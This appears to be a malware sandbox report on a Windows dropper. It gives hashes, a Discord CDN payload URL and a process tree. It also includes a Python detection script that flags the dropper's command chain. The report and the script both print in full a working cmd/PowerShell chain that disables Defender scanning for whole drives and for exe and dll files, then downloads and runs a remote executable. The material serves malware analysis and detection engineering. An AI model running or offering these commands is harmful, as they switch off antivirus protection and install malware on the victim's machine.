Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    19/09/2024, 02:02

General

  • Target

    ea636008805a0ef9e5147b5bd2d1aa94_JaffaCakes118.exe

  • Size

    55KB

  • MD5

    ea636008805a0ef9e5147b5bd2d1aa94

  • SHA1

    f15c13f68e9dcd774b9fae8850d828510d64f9c1

  • SHA256

    4e6dce334a8b9fbf42231cad17af17b943de13cfbc1f55e9624cda0fbc4986cc

  • SHA512

    6502a4414554730aa19f4987c28c68bd00f9c2e4e2f2f506a81a06291a12bba28abfceb9a40742e87745f69db63ede360b027f4265bba6c627dc0c9ee2b76801

  • SSDEEP

    1536:hxV96b1u6/f4h5TLoPs2Ldd5l6shjOUh:h6Foh5TLoPs2Lb6sZT

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs (exe.dropper)

    https://cdn.discordapp.com/attachments/878081249296674846/892398462266671104/WindowsUpdater.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ea636008805a0ef9e5147b5bd2d1aa94_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ea636008805a0ef9e5147b5bd2d1aa94_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/878081249296674846/892398462266671104/WindowsUpdater.exe', (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe')) & powershell Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe') & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2196
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2660
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/878081249296674846/892398462266671104/WindowsUpdater.exe', (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe'))
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:936
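The process tree above is the whole story of this sample: cmd.exe /c chains four PowerShell invocations that add Defender exclusions for the user profile, temp, system root and both drives, exclude the exe and dll extensions, fetch WindowsUpdater.exe from the Discord CDN with WebClient.DownloadFile, and launch it from %AppData%. The block below is an added example written for this page, not code from the sandbox or from the sample: it tags each chained segment the way a detection rule over process-creation telemetry (Sysmon Event ID 1 or Windows 4688 command lines) would, and raises a verdict when exclusion, download and execution appear in one chain. The two command lines are constructed from the report's cmd.exe process (PID 2644) plus a benign control; the rule names and the ATT&CK technique mapping are this example's own assumptions.

```python
"""Added example (not part of the sandbox report): tag the PowerShell chain the
dropper handed to cmd.exe /c, as a detection engineer would over process-creation
telemetry. Sample command lines are constructed from the report's process tree."""
import re

# Constructed from the report's cmd.exe process (PID 2644); the four child
# powershell.exe processes in the tree are the four segments of this chain.
SAMPLE_CMDLINE = r'''"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/878081249296674846/892398462266671104/WindowsUpdater.exe', (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe')) & powershell Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe') & exit'''

# Constructed benign control line.
BENIGN_CMDLINE = r'''"C:\Windows\System32\cmd.exe" /c dir & echo done'''

# (tag, ATT&CK technique, pattern). Case-insensitive because PowerShell cmdlet
# and parameter names are. The technique mapping is this example's assumption.
RULES = [
    ("defender_exclusion_path", "T1562.001",
     re.compile(r"Add-MpPreference\b.*-ExclusionPath\b", re.I)),
    ("defender_exclusion_ext", "T1562.001",
     re.compile(r"Add-MpPreference\b.*-ExclusionExtension\b", re.I)),
    ("webclient_download", "T1105",
     re.compile(r"Net\.WebClient\)?\s*\.Download(File|String|Data)\s*\(", re.I)),
    ("discord_cdn_url", "T1105",
     re.compile(r"https?://cdn\.discordapp\.com/attachments/", re.I)),
    ("start_process", "T1059.001",
     re.compile(r"\bStart-Process\b", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
EXCL_RE = re.compile(r"-ExclusionPath\s+@\(([^)]*)\)", re.I)
# Excluding a whole drive leaves Defender with nothing left to scan.
WHOLE_DRIVE = {"$env:systemdrive", "$env:homedrive"}


def split_cmd_chain(cmdline: str) -> list[str]:
    """Return the commands chained after `cmd.exe /c`, split on ' & '.
    Quoted or escaped '&' is not handled (the sample contains none)."""
    m = re.search(r"\s/c\s+(.*)$", cmdline, re.I | re.S)
    body = m.group(1) if m else cmdline
    return [s.strip() for s in body.split(" & ") if s.strip()]


def classify(segment: str) -> list[tuple[str, str]]:
    """All (tag, technique) rules matching one chained command."""
    return [(tag, tech) for tag, tech, rx in RULES if rx.search(segment)]


def excluded_paths(segment: str) -> list[str]:
    """Entries of an Add-MpPreference -ExclusionPath @(...) array."""
    m = EXCL_RE.search(segment)
    if not m:
        return []
    return [p.strip().strip("'\"") for p in m.group(1).split(",") if p.strip()]


def analyse_chain(cmdline: str) -> dict:
    """Tag each segment, then decide whether the chain is the
    exclusion -> download -> execute dropper pattern seen in the report."""
    segments = split_cmd_chain(cmdline)
    tags, techniques, excluded = set(), set(), []
    for seg in segments:
        for tag, tech in classify(seg):
            tags.add(tag)
            techniques.add(tech)
        excluded += excluded_paths(seg)
    if any(p.lower() in WHOLE_DRIVE for p in excluded):
        tags.add("whole_drive_exclusion")
    evasion = tags & {"defender_exclusion_path", "defender_exclusion_ext"}
    if evasion and "webclient_download" in tags and "start_process" in tags:
        verdict = "dropper_chain"
    elif tags:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {
        "segments": len(segments),
        "tags": sorted(tags),
        "techniques": sorted(techniques),
        "urls": URL_RE.findall(cmdline),
        "excluded_paths": excluded,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(analyse_chain(line))
```

The same rules apply unchanged to the four child powershell.exe command lines (PIDs 2196, 2660, 536 and 936) if the parent cmd.exe line is not logged; correlating them by parent PID gives the same chain verdict. Two caveats for production use: the splitter does not implement cmd.exe quoting rules, so a `&` inside quotes would break a segment, and Add-MpPreference only succeeds from an elevated process, so on a host where the dropper ran unelevated the exclusions will have failed even though the command lines were recorded.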

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    c6da1316d5088e02033fdbbd12b1ba2c

    SHA1

    cc6a571affc97c8a8e72bdb487ce0282af3b3caa

    SHA256

    132eca3289f3055b0b5e8719e02700af303c5861e8ebe1915bc5fc64a983a669

    SHA512

    54b917c29ad5801c6498c673c98b6498ad9dc239c280c2e37835594e578368de1a0cf5124a33b42e7b20284323d0409feed42e5ca00b6423934dcab94afc1445

  • memory/2196-7-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB

  • memory/2196-8-0x0000000001E20000-0x0000000001E28000-memory.dmp

    Filesize

    32KB

  • memory/2660-14-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

    Filesize

    2.9MB

  • memory/2660-15-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

  • memory/2748-0-0x000007FEF5233000-0x000007FEF5234000-memory.dmp

    Filesize

    4KB

  • memory/2748-1-0x0000000000370000-0x0000000000384000-memory.dmp

    Filesize

    80KB

  • memory/2748-2-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp

    Filesize

    9.9MB